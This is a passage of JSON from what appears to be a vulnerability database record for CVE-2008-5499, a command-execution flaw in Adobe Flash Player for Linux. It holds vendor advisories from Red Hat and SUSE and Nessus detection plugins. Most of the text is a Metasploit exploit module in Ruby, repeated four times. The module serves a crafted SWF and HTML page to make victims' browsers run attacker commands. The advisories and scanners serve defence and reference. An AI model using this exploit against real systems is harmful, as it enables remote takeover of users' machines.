\n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2008-01-07T00:00:00", "published": "2008-01-07T00:00:00", "id": "SAINT:CB4CD425A2F03D26817AFADE0D8C3615", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "type": "saint", "title": "Adobe Flash Player ActionScript launch command execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T10:24:17", "description": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability. CVE-2008-5499. Remote exploit for linux platform", "published": "2012-04-20T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "id": "EDB-ID:18761", "href": "https://www.exploit-db.com/exploits/18761/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player for Linux,\r\n\t\t\t\t\tversion 10.0.12.36 and 9.0.151.0 and prior.\r\n\t\t\t\t\tAn input validation vulnerability allows command execution when the browser\r\n\t\t\t\t\tloads a SWF file which contains shell metacharacters in the arguments to\r\n\t\t\t\t\tthe ActionScript launch method.\r\n\r\n\t\t\t\t\tThe victim must have Adobe AIR installed for the exploit to work. 
This module\r\n\t\t\t\t\twas tested against version 10.0.12.36 (10r12_36).\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-5499'],\r\n\t\t\t\t\t['OSVDB', '50796'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n\t\t\t\t\t['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-5499.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@swf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tmsg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\"\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status(\"#{msg} Sending Exploit SWF\")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t\t<head>\r\n\t\t\t</head>\r\n\t\t\t<body>\r\n\t\t\t<center>\r\n\t\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" 
codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t\t\t<param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" />\r\n\t\t\t\t<embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\"\r\n\t\t\t\t\ttype=\"application/x-shockwave-flash\"\r\n\t\t\t\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\">\r\n\t\t\t\t</embed>\r\n\r\n\t\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status(\"#{msg} Sending HTML...\")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18761/"}], "redhat": [{"lastseen": "2019-05-29T14:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5499"], "description": "The flash-plugin package contains a Firefox-compatible Adobe Flash Player\nWeb browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain SWF\n(Shockwave Flash) content. This may have made it possible to execute\narbitrary code on a victim's machine, if the victim opened a malicious\nAdobe Flash file. 
(CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.0.15.3 for users of Red Hat Enterprise\nLinux 5 Supplementary, and 9.0.152.0 for users of Red Hat Enterprise 3 and\n4 Extras.", "modified": "2017-09-08T11:55:42", "published": "2008-12-19T05:00:00", "id": "RHSA-2008:1047", "href": "https://access.redhat.com/errata/RHSA-2008:1047", "type": "redhat", "title": "(RHSA-2008:1047) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5499"], "description": "The Adobe Flash Player was updated to fix an unspecified vulnerability that allowed attackers to take control of the victim's system by having the victim load a specially crafted SWF file, for instance embedded in a web page (CVE-2008-5499).\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-12-20T10:10:12", "published": "2008-12-20T10:10:12", "id": "SUSE-SA:2008:059", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00006.html", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:19", "description": "", "published": "2012-04-20T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ActionScript Launch Command Execution ", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "id": "PACKETSTORM:112009", "href": "https://packetstormsecurity.com/files/112009/Adobe-Flash-Player-ActionScript-Launch-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Adobe Flash Player for Linux, \nversion 10.0.12.36 and 9.0.151.0 and prior. \nAn input validation vulnerability allows command execution when the browser \nloads a SWF file which contains shell metacharacters in the arguments to \nthe ActionScript launch method. \n \nThe victim must have Adobe AIR installed for the exploit to work. This module \nwas tested against version 10.0.12.36 (10r12_36). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version \n], \n'References' => \n[ \n['CVE', '2008-5499'], \n['OSVDB', '50796'], \n['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], \n['URL', 'http://www.securityfocus.com/bid/32896/exploit'] \n], \n'DefaultOptions' => \n{ \n'HTTP::compression' => 'gzip', \n'HTTP::chunked' => true \n}, \n'Platform' => 'unix', # so unix cmd exec payloads are ok \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n[ 'Automatic', {}], \n], \n'DisclosureDate' => 'Dec 17 2008', \n'DefaultTarget' => 0)) \n \nend \n \ndef exploit \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-5499.swf\" ) \nfd = File.open( path, \"rb\" ) \n@swf = fd.read(fd.stat.size) \nfd.close \n \nsuper \nend \n \ndef on_request_uri(cli, request) \nmsg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\" \ntrigger = @swf \ntrigger_file = rand_text_alpha(rand(6)+3) + \".swf\" \n \nobj_id = rand_text_alpha(rand(6)+3) \n \nif request.uri.match(/\\.swf/i) \nprint_status(\"#{msg} Sending Exploit SWF\") \nsend_response(cli, 
trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) \nreturn \nend \n \nif request.uri.match(/\\.txt/i) \nsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) \nreturn \nend \n \nhtml = <<-EOS \n<html> \n<head> \n</head> \n<body> \n<center> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" /> \n<embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\" \ntype=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\"> \n</embed> \n \n</object> \n</center> \n \n</body> \n</html> \nEOS \n \nprint_status(\"#{msg} Sending HTML...\") \nsend_response(cli, html, { 'Content-Type' => 'text/html' }) \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112009/adobe_flashplayer_aslaunch.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T17:57:35", "description": "No description provided by source.", "published": "2012-04-20T00:00:00", "type": "seebug", "title": "Adobe Flash Player ActionScript Launch Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60075", "id": "SSV:60075", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Adobe Flash Player for Linux,\r\n version 10.0.12.36 and 9.0.151.0 and prior.\r\n An input validation vulnerability allows command execution when the browser\r\n loads a SWF file which contains shell metacharacters in the arguments to\r\n the ActionScript launch method.\r\n\r\n The victim must have Adobe AIR installed for the exploit to work. This module\r\n was tested against version 10.0.12.36 (10r12_36).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2008-5499'],\r\n ['OSVDB', '50796'],\r\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n ['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'HTTP::compression' => 'gzip',\r\n 'HTTP::chunked' => true\r\n },\r\n 'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}],\r\n ],\r\n 'DisclosureDate' => 'Dec 17 2008',\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def exploit\r\n path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )\r\n fd = File.open( path, "rb" )\r\n @swf = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"\r\n trigger = @swf\r\n trigger_file = rand_text_alpha(rand(6)+3) + ".swf"\r\n\r\n obj_id = 
rand_text_alpha(rand(6)+3)\r\n\r\n if request.uri.match(/\\.swf/i)\r\n print_status("#{msg} Sending Exploit SWF")\r\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n return\r\n end\r\n\r\n if request.uri.match(/\\.txt/i)\r\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n return\r\n end\r\n\r\n html = <<-EOS\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n <center>\r\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n <param name="movie" value="#{get_resource}#{trigger_file}" />\r\n <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"\r\n type="application/x-shockwave-flash"\r\n pluginspage="http://www.macromedia.com/go/getflashplayer">\r\n </embed>\r\n\r\n </object>\r\n </center>\r\n\r\n </body>\r\n </html>\r\n EOS\r\n\r\n print_status("#{msg} Sending HTML...")\r\n send_response(cli, html, { 'Content-Type' => 'text/html' })\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60075", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:54:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72802", "id": "SSV:72802", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player for Linux,\r\n\t\t\t\t\tversion 10.0.12.36 and 9.0.151.0 and prior.\r\n\t\t\t\t\tAn input validation vulnerability allows command execution when the browser\r\n\t\t\t\t\tloads a SWF file which contains shell metacharacters in the arguments to\r\n\t\t\t\t\tthe ActionScript launch method.\r\n\r\n\t\t\t\t\tThe victim must have Adobe AIR installed for the exploit to work. This module\r\n\t\t\t\t\twas tested against version 10.0.12.36 (10r12_36).\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-5499'],\r\n\t\t\t\t\t['OSVDB', '50796'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n\t\t\t\t\t['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@swf = 
fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tmsg = "#{cli.peerhost.ljust(16)} #{self.shortname}"\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + ".swf"\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status("#{msg} Sending Exploit SWF")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t\t<head>\r\n\t\t\t</head>\r\n\t\t\t<body>\r\n\t\t\t<center>\r\n\t\t\t<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n\t\t\t\t<param name="movie" value="#{get_resource}#{trigger_file}" />\r\n\t\t\t\t<embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"\r\n\t\t\t\t\ttype="application/x-shockwave-flash"\r\n\t\t\t\t\tpluginspage="http://www.macromedia.com/go/getflashplayer">\r\n\t\t\t\t</embed>\r\n\r\n\t\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status("#{msg} Sending HTML...")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72802"}, {"lastseen": "2017-11-19T21:19:37", "description": "BUGTRAQ ID: 32896\r\nCVE(CAN) ID: CVE-2008-5499\r\n\r\nFlash Player is a very popular FLASH player.\r\n\r\nFlash 
Player has an implementation vulnerability: if a specially crafted SWF file is opened with the Linux version of Adobe Flash Player, arbitrary code may be executed on the user's system.\n\nAdobe Flash Player for Linux 9.x\r\nAdobe Flash Player for Linux 10.x\n Adobe\r\n-----\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:\r\n\r\n<a href=http://www.adobe.com/go/kb406791 target=_blank>http://www.adobe.com/go/kb406791</a>\r\n<a href=http://get.adobe.com/flashplayer target=_blank>http://get.adobe.com/flashplayer</a>\r\n\r\nRedHat\r\n------\r\nRedHat has released a security advisory (RHSA-2008:1047-01) and corresponding patches for this issue:\r\nRHSA-2008:1047-01: Critical: flash-plugin security update\r\nLink: <a href=https://www.redhat.com/support/errata/RHSA-2008-1047.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1047.html</a>", "published": "2008-12-23T00:00:00", "title": "Adobe Flash Player for Linux SWF File Handling Code Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2008-12-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4580", "id": "SSV:4580", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2021-01-01T05:51:08", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : flash-player 
(flash-player-378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_0_FLASH-PLAYER-081218.NASL", "href": "https://www.tenable.com/plugins/nessus/39961", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-378.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39961);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-378)\");\n script_summary(english:\"Check for the flash-player-378 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=458573\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 
ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"flash-player-9.0.152.0-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:52:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_1_FLASH-PLAYER-081218.NASL", "href": "https://www.tenable.com/plugins/nessus/40215", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-378.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40215);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-378)\");\n script_summary(english:\"Check for the flash-player-378 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=458573\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) 
